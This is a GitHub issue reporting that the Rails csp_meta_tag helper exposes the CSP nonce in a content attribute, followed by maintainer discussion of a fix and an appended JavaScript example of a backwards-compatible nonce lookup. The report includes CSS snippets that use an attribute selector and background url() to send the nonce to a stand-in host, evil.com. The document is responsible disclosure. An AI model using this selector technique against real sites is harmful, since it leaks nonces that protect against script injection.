
csp_meta_tag helper generates a meta tag without making use of nonce hiding, which could lead to exfiltration of the nonce value #51580

Open
tvongaza opened this issue Apr 16, 2024 · 2 comments

Comments

@tvongaza

tvongaza commented Apr 16, 2024

Previously reported via Hackerone, reference #2432937 - Was asked by @tenderlove to create an issue here.

@tvongaza thanks for reporting this! I'm also not clear on how one would go about exploiting / using this information. However, I definitely agree we should fix the attribute name in the meta tag. Would you mind filing an issue in the public tracker, and we can fix it there?
Thank you!

Steps to reproduce

The Rails csp_meta_tag helper generates a meta tag with a content attribute which in theory can have its nonce value exfiltrated.

Example:

<%= csp_meta_tag %>

Generates:

<meta name="csp-nonce" content="f7505009ff5f468269b583653293acb5">

Which an attacker could access via carefully crafted css such as:

/* the content attribute is an ordinary attribute, so an attribute selector can match on its value */
meta[content~="f7505009ff5f468269b583653293acb5"] {
  background: url("https://evil.com/nonce?f7505009ff5f468269b583653293acb5");
}

While I'm not too sure how this type of attack vector could be exploited or used (I have no working exploit), there seem to be ways to curb it by using the nonce attribute instead of the content attribute for the nonce value, which in most browsers has nonce hiding behaviour.

Example, if we instead generated a meta tag like this:

<meta name="csp-nonce" nonce="f7505009ff5f468269b583653293acb5">

The following would no longer work, as the only way to access the nonce value is via the element.nonce property.

/* this fails, as in CSS the nonce attribute will always read as an empty string */
meta[nonce~="f7505009ff5f468269b583653293acb5"] {
  background: url("https://evil.com/nonce?f7505009ff5f468269b583653293acb5");
}
// the content attribute is blanked by nonce hiding, only the IDL property keeps the value
document.querySelector('meta[name="csp-nonce"]').getAttribute("nonce"); // returns an empty string
document.querySelector('meta[name="csp-nonce"]').nonce; // returns "f7505009ff5f468269b583653293acb5"

More information:
whatwg/html#2369
https://developer.mozilla.org/en-US/docs/Web/HTML/Global_attributes/nonce#accessing_nonces_and_nonce_hiding

Note this would be a breaking change for libraries making use of the csp_meta_tag's content attributes. Examples include (but not limited to):

Impact

Low, not too sure what sort of attack vectors this achieves - others more familiar in this space may be more aware. However if there is an opportunity to have defence in depth we should take it.

Expected behavior

Nonce value exfiltration should be protected against.

Actual behavior

Nonce value exfiltration is possible.

System configuration

Rails version: HEAD as of April 16, 2024 (commit 1428ef9)

Ruby version: 3.3

@tenderlove
Member

I think we should make this change, but I'm not sure what the impact is on existing JS libraries. We're going to have to coordinate fixing Rails along with the corresponding JS libraries. If someone wants to handle that work, I'd really appreciate it!

@tvongaza
Author

On the Rails side, I wonder if it would make sense to add a deprecation warning for csp_meta_tag and introduce a csp_nonce_meta_tag with the new behaviour. This would allow for a more graceful upgrade path.

I can take a shot at some PRs, I think the JS libraries can be made backwards compatible by looking for both nonce & content prior to the rails change.

Question: How are the JS files updated which are included in the Rails source? I.e. should I make PRs against both Trix and Rails for the change, or would just the Trix repo be enough, with the changes applied to the Rails Trix asset at some point?
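Added example (not code from the issue, from Rails, or from Trix): the kind of backwards-compatible lookup a JS library could use to work with both shapes of the meta tag discussed above. It reads the nonce through the `.nonce` IDL property first (the only way to read it once nonce hiding applies) and falls back to the `content` attribute that the current csp_meta_tag emits, then applies the value to a dynamically created `<script>` through the same property so it never lands in a content attribute. The function names are hypothetical, and the fake document and element objects at the bottom are constructed stand-ins so the functions can be exercised outside a browser. One caveat for anyone trying this in a real page: per the HTML spec, the browser only blanks the `nonce` content attribute when the element is connected to a document whose CSP was delivered in an HTTP header, so a policy delivered only via `<meta http-equiv>` does not get the hiding behaviour.

```javascript
// Added example, not from Rails, Trix or the issue author.
//
// Current Rails output:  <meta name="csp-nonce" content="...">  -> readable via getAttribute("content")
// Proposed output:       <meta name="csp-nonce" nonce="...">    -> readable only via the .nonce property
//                                                                  (getAttribute("nonce") returns "" under nonce hiding)

// Hypothetical helper: find the page nonce whichever tag shape Rails rendered.
function cspNonceFrom(doc) {
  const meta = doc.querySelector('meta[name="csp-nonce"]');
  if (!meta) return null;
  // Prefer the IDL property. Under nonce hiding it is the only accessor that
  // still returns the value; on a <meta> without a nonce it is "".
  if (typeof meta.nonce === "string" && meta.nonce !== "") return meta.nonce;
  // Fall back to the content attribute used by csp_meta_tag today.
  const content = meta.getAttribute("content");
  return content ? content : null;
}

// Hypothetical helper: build a <script> carrying the page nonce. The .nonce
// setter only updates the element's internal nonce slot, so the value is never
// written into a content attribute that an attribute selector could match.
function createNoncedScript(doc, src) {
  const script = doc.createElement("script");
  const nonce = cspNonceFrom(doc);
  if (nonce) script.nonce = nonce;
  script.src = src;
  return script;
}

// Constructed stand-ins for the DOM so this file runs without a browser.
// Each fake element models the attribute/property split: `attrs` is what
// getAttribute() sees, `nonceProp` is what the .nonce IDL property returns.
function fakeElement(attrs, nonceProp) {
  return {
    nonce: nonceProp,
    src: "",
    getAttribute: (name) => (name in attrs ? attrs[name] : null),
  };
}
function fakeDocument(meta) {
  return {
    querySelector: (sel) => (sel === 'meta[name="csp-nonce"]' ? meta : null),
    createElement: () => fakeElement({}, ""),
  };
}

const NONCE = "f7505009ff5f468269b583653293acb5"; // sample value from the issue

// Shape emitted by csp_meta_tag today: nonce in the content attribute, no nonce property.
const legacyDoc = fakeDocument(fakeElement({ name: "csp-nonce", content: NONCE }, ""));
// Proposed shape after nonce hiding: the attribute reads back as "", the property keeps the value.
const hiddenDoc = fakeDocument(fakeElement({ name: "csp-nonce", nonce: "" }, NONCE));
// Page with no CSP meta tag at all.
const noCspDoc = fakeDocument(null);
```

Both `cspNonceFrom(legacyDoc)` and `cspNonceFrom(hiddenDoc)` return the same nonce, so a library shipping this lookup keeps working across the Rails change, while `cspNonceFrom(noCspDoc)` returns null and the script is created without a nonce.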
